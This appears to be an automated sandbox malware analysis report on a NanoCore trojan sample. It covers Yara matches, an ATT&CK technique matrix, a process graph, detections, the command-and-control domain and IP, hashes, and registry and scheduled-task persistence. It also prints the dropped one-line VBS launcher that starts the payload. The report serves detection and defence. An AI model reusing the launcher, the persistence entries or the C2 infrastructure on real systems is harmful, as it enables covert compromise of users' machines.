        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c9e458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.b00000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.60b4629.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d55448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4537078.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c560b.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3b041.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4cd3078.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f3560b.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c69c50.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44cb041.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3e5c088.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3df3078.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.4465058.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4d3c088.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.bc0000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 20.3.xmjk.pif.4c35448.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 6.2.RegSvcs.exe.3f307ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.3.xmjk.pif.44ce068.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3dbe458.0.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 27.3.xmjk.pif.3d89c50.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 25.2.RegSvcs.exe.44c07ce.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000004.00000003.350179976.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350063292.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411798480.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412888978.0000000003E28000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394776495.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352276623.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411513032.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394077058.0000000003EA4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395083059.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411892507.0000000003E5C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414829262.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352230581.00000000044CE000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411602320.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392253067.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.412949182.00000000005A6000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414560875.0000000003DF3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352180992.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.439114989.0000000000752000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352056687.000000000449A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391774753.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411727538.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391477356.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.414304073.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391366953.0000000004C36000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.351507345.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350312058.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350212865.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.413709722.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392467054.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411158873.0000000003D56000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.395194489.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350502878.0000000004503000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.581022172.00000000060B0000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391714719.0000000004C6A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.573655036.0000000000B02000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394033269.0000000004D08000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000006.00000002.579331613.0000000003F29000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440127421.0000000003E89000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.350252312.0000000004466000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352384580.0000000004431000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411291828.0000000003DBF000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391833117.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411683482.0000000003DF4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391948004.0000000004CD4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418761309.0000000004479000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.391514426.0000000004C01000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411424843.0000000003D8A000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000003.352498016.0000000003748000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.418519690.0000000003471000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000019.00000002.415517736.0000000000BC2000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.392573341.0000000004D3C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394945613.0000000004CD3000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.415163976.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000014.00000003.394535307.0000000004C9F000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000003.411346377.0000000003D21000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001F.00000002.440034174.0000000002E81000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 6660, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5792, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 4356, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5572, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: xmjk.pif PID: 3412, type: MEMORYSTR
        Source: C:\Users\user\31956653\xmjk.pifCode function: 13_2_0045C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,#35,13_2_0045C06C

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid Accounts2Scripting11DLL Side-Loading1Exploitation for Privilege Escalation1Disable or Modify Tools11Input Capture31System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
        Default AccountsNative API1Valid Accounts2DLL Side-Loading1Deobfuscate/Decode Files or Information11LSASS MemoryAccount Discovery1Remote Desktop ProtocolInput Capture31Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsCommand and Scripting Interpreter2Scheduled Task/Job1Valid Accounts2Scripting11Security Account ManagerFile and Directory Discovery2SMB/Windows Admin SharesClipboard Data2Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsScheduled Task/Job1Logon Script (Mac)Access Token Manipulation21Obfuscated Files or Information2NTDSSystem Information Discovery36Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptProcess Injection312Software Packing12LSA SecretsSecurity Software Discovery121SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol1Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonScheduled Task/Job1DLL Side-Loading1Cached Domain CredentialsVirtualization/Sandbox Evasion21VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol11Jamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading12DCSyncProcess Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemApplication Window Discovery11Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion21/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
        Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
        Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection312Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
        Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 500960 Sample: dAkJsQr7A9.exe Startdate: 12/10/2021 Architecture: WINDOWS Score: 100 57 strongodss.ddns.net 2->57 61 Malicious sample detected (through community Yara rule) 2->61 63 Multi AV Scanner detection for submitted file 2->63 65 Sigma detected: NanoCore 2->65 67 8 other signatures 2->67 10 dAkJsQr7A9.exe 33 2->10         started        14 wscript.exe 1 2->14         started        16 xmjk.pif 2->16         started        18 3 other processes 2->18 signatures3 process4 file5 55 C:\Users\user\31956653\xmjk.pif, PE32 10->55 dropped 85 Drops PE files with a suspicious file extension 10->85 20 xmjk.pif 2 4 10->20         started        24 xmjk.pif 14->24         started        26 xmjk.pif 14->26         started        87 Writes to foreign memory regions 16->87 89 Allocates memory in foreign processes 16->89 91 Injects a PE file into a foreign processes 16->91 28 RegSvcs.exe 16->28         started        30 conhost.exe 18->30         started        32 conhost.exe 18->32         started        signatures6 process7 file8 53 C:\Users\user\AppData\Local\...\RegSvcs.exe, PE32 20->53 dropped 75 Multi AV Scanner detection for dropped file 20->75 77 Machine Learning detection for dropped file 20->77 79 Writes to foreign memory regions 20->79 34 RegSvcs.exe 1 11 20->34         started        81 Allocates memory in foreign processes 24->81 83 Injects a PE file into a foreign processes 24->83 signatures9 process10 dnsIp11 59 strongodss.ddns.net 185.19.85.175, 48562, 49749, 49750 DATAWIRE-ASCH Switzerland 34->59 47 C:\Users\user\AppData\Roaming\...\run.dat, Non-ISO 34->47 dropped 49 C:\Users\user\AppData\Local\...\tmp7982.tmp, XML 34->49 dropped 51 C:\Program Files (x86)\...\dhcpmon.exe, PE32 34->51 dropped 69 Protects its processes via BreakOnTermination flag 34->69 71 Uses schtasks.exe or at.exe to add and modify task schedules 34->71 73 Hides that the sample has been downloaded from the Internet (zone.identifier) 34->73 39 schtasks.exe 1 34->39         started        41 schtasks.exe 1 34->41         started        file12 signatures13 process14 process15 43 conhost.exe 39->43         started        45 conhost.exe 41->45         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        dAkJsQr7A9.exe59%ReversingLabsWin32.Trojan.Sabsik
        dAkJsQr7A9.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\31956653\xmjk.pif100%Joe Sandbox ML
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%MetadefenderBrowse
        C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe0%ReversingLabs
        C:\Users\user\31956653\xmjk.pif37%MetadefenderBrowse
        C:\Users\user\31956653\xmjk.pif56%ReversingLabsWin32.Packed.Generic
        C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%MetadefenderBrowse
        C:\Users\user\AppData\Local\Temp\RegSvcs.exe0%ReversingLabs

        Unpacked PE Files

        SourceDetectionScannerLabelLinkDownload
        6.2.RegSvcs.exe.b00000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
        6.2.RegSvcs.exe.60b0000.11.unpack100%AviraTR/NanoCore.fadteDownload File
        25.2.RegSvcs.exe.bc0000.1.unpack100%AviraTR/Dropper.MSIL.Gen7Download File

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.onnodb.com/aetraymenuH(0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        windowsupdate.s.llnwi.net
        		178.79.242.0
        		truefalse
          		high
          strongodss.ddns.net
          		185.19.85.175
          		truefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.onnodb.com/aetraymenuH(xmjk.pif, 00000004.00000000.332849092.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000000D.00000000.366495909.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000014.00000000.372500694.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 00000016.00000000.390620091.000000000049B000.00000002.00020000.sdmp, xmjk.pif, 0000001B.00000002.427944627.000000000049B000.00000002.00020000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000006.00000002.576672734.0000000002EE1000.00000004.00000001.sdmpfalse
              		high

              Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public

              IPDomainCountryFlagASNASN NameMalicious
              185.19.85.175
              		strongodss.ddns.netSwitzerland
              		48971DATAWIRE-ASCHfalse

              General Information

              Joe Sandbox Version:33.0.0 White Diamond
              Analysis ID:500960
              Start date:12.10.2021
              Start time:12:33:05
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 15m 29s
              Hypervisor based Inspection enabled:false
              Report type:full
              Sample file name:dAkJsQr7A9.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:45
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@27/41@10/1
              EGA Information:Failed
              HDC Information:
              • Successful, ratio: 12% (good quality ratio 11.4%)
              • Quality average: 74.5%
              • Quality standard deviation: 27.9%
              HCA Information:Failed
              Cookbook Comments:
              • Adjust boot time
              • Enable AMSI
              • Found application associated with file extension: .exe
              Warnings:
              Show All
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, BackgroundTransferHost.exe, consent.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
              • Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.50.102.62, 93.184.221.240, 20.199.120.151, 20.199.120.182, 20.82.210.154, 2.20.178.24, 2.20.178.33, 20.54.110.249, 52.251.79.25, 40.112.88.60, 95.100.216.89
              • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing behavior and disassembly information.
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtSetInformationFile calls found.
              • VT rate limit hit for: /opt/package/joesandbox/database/analysis/500960/sample/dAkJsQr7A9.exe

              Simulations

              Behavior and APIs

              TimeTypeDescription
              12:34:30AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Chrome C:\Users\user\31956653\xmjk.pif C:\Users\user\31956653\thjfdg.xcp
              12:34:37Task SchedulerRun new task: DHCP Monitor path: "C:\Users\user\AppData\Local\Temp\RegSvcs.exe" s>$(Arg0)
              12:34:37API Interceptor803x Sleep call for process: RegSvcs.exe modified
              12:34:38AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user\31956653\Update.vbs
              12:34:39Task SchedulerRun new task: DHCP Monitor Task path: "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" s>$(Arg0)
              12:34:48AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              No context

              ASN

              No context

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
              Process:C:\Users\user\AppData\Local\Temp\RegSvcs.exe
              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):45152
              Entropy (8bit):6.149629800481177
              Encrypted:false
              SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
              MD5:2867A3817C9245F7CF518524DFD18F28
              SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
              SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
              SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
              Malicious:false
              Antivirus:
              • Antivirus: Metadefender, Detection: 0%, Browse
              • Antivirus: ReversingLabs, Detection: 0%
              Reputation:unknown
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...
              C:\Users\user\31956653\Update.vbs
              Process:C:\Users\user\31956653\xmjk.pif
              File Type:ASCII text, with no line terminators
              Category:modified
              Size (bytes):0
              Entropy (8bit):0.0
              Encrypted:false
              SSDEEP:3:FER/n0eFH5OWXp5TcQfSOL0eWXp5TcQfRfH:FER/lFHIWXpDWeWXpD5fH
              MD5:2C760FEAA61BDB817B1A1E47DB415464
              SHA1:4D4A10381CF79693E07DC12F6D3D2E817FE0F8E6
              SHA-256:DEF99AF20BF09CBDCADBD5265CE8030CDE157CB717EE366B0D13CE979DAF87B9
              SHA-512:011F977A63C157775FF4114E6FC512DBDE71338F1C6F77CCEDCF916A5AFF0E0F4E1A861EE45C0C96E8FBFD01FA90805ADAD1AEC5A2DBB4E1D71F23F2AB16F409
              Malicious:false
              Reputation:unknown
              Preview: CreateObject("WScript.Shell").Run "C:\Users\user\31956653\xmjk.pif C:\Users\user\31956653\thjfdg.xcp"
              C:\Users\user\31956653\ailgkjbn.log
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):566
              Entropy (8bit):5.474806202875037
              Encrypted:false
              SSDEEP:12:6RsfOzSb2eBfwqcTHw3I3QK5/ph6hoAen4PWh:1ZdqT/3Qe/Nniq
              MD5:28E06D43C4A87B30ACF1E733562A4803
              SHA1:974D8AE0C0E74D013FADE83771E8115AF06E743C
              SHA-256:F2AD07A7279070982BF482DEAFF192A830CB9BB30D107D068BAD4DB614B480A4
              SHA-512:EA06C6FA427D35E946DA94DB02D5465212DB2D9C28C1A233D435681561F57695CA95E849416A85A0993D7ED8C50FE4E1E3F43D24F6D79F273BA6DAEA8A00F713
              Malicious:false
              Reputation:unknown
              Preview: 00m2MoCZR08G6T6aTK9zimrgta33405Y9Kw39Ep1OTNB7x0sZha012w881321W35hR7lGJe145479P7256eg6m0d3WK3zvE473994B9alhKohV90i7..B70A879332d535y2mY3h..YDc71Y83x3km48rSYe8528w9N637v97AQmoa9382X7TT5sBJ7x23u9KhDnv79oA82nz0Lu8W96x5QZ73d0s8..h08pB6JGffFk3eVwuJ13R13Q7nJM96LRbj3V5PpuClC5578K64OSl695WAX87dw02lXaShcd475MA2izFFNr7lCh2sHm4a751o0u740Na92322h2eH7Jm1Y692488653kGY04G5Y27YCH19035..878u6UFRAm6B4rle1NGX3340691R1YV9Wu45S81Ke4371470583153Li6n588M8v9m476n2881uW4E14d697V1bebB128lkR4c6E4v1KM8NO2UII9691XZ2wuP0Ziefit7kZJb495OZ88Z3525vvK00Qiw6WRGJ23C45s16WP281D7Nd985cPn2926Nw8hn4..
              C:\Users\user\31956653\bwhgjbnh.log
              Process:C:\Users\user\Desktop\dAkJsQr7A9.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):618
              Entropy (8bit):5.492211285373292
              Encrypted:false
              SSDEEP:12:g5mQnoBIIzM4IsfkXZlqgjwooNtMR5i1ISn1URtd42B66F2a:HQoBDhMPvjwokiR5i1IQeRD42B6a/
              MD5:AB4AB7821096064493E76399254C86E9
              SHA1:BFCD02463B2461C33E42D20893E25E3C11FE793F
              SHA-256:20349787AC0F07ED5749CF5676CEE6D4977B714A4716BB1B3398C04DDE439B9A
              SHA-512:C83E64D7262E7CE7494CF9EBD89D6F04162B59C39ABCC337E365E3C7BAFE6135610BA83B8084F79159A2D107657697B366F1A286F77B9583EC5742F47D1B2E81
              Malicious:false
              Reputation:unknown
              Preview: 94uuK2N6xOp15273v15vm9i88EN6X003T230V44dYb9L167XVW61a9ege0iu4VSk8un8I7kKa56Xen5t0Jq0uPk1S6f11G054i7YxXV0u4WPTKJV2fO400W88o7853let9ux8fqN4J0wq07OEh71H..JB99588393H4jOVQVz..3y50Mt07033210..2T582U0WPoz4d0dX7327y..Y79nY9jL..niZQ71tjipa0NZH9Qu8738g1l75bz034vIzFW1371z6J6iVu31qqXd8K06TT9aI22s5a..VvMa84ZuW5RoH6mi80Db844T7Q35fXyq143grbpCxy2M8N3G14WJ67J0nTZ89151433VWi9q43Th09GDKln3TsH7Z818e0a515299a6UkbtgVM2a15..p2SG4W60HW6Q0u9703D..d5py1IYbx7o4s3G0kQIN5EDs18327M0F1R37798d85pJg698I6gH358kpL14W8p1U7ut9d055xqq40k4W59M4M8xxuJp1H78Dxm7x3R55tDD987VNswG9BTT96PDd0t6W6409V56w53gooD73o1Sl72FP4M03p6O39ND0842s82TM8G86B624C5NR0637..
              C:\Users\user\31956653\cmeaaw.icm
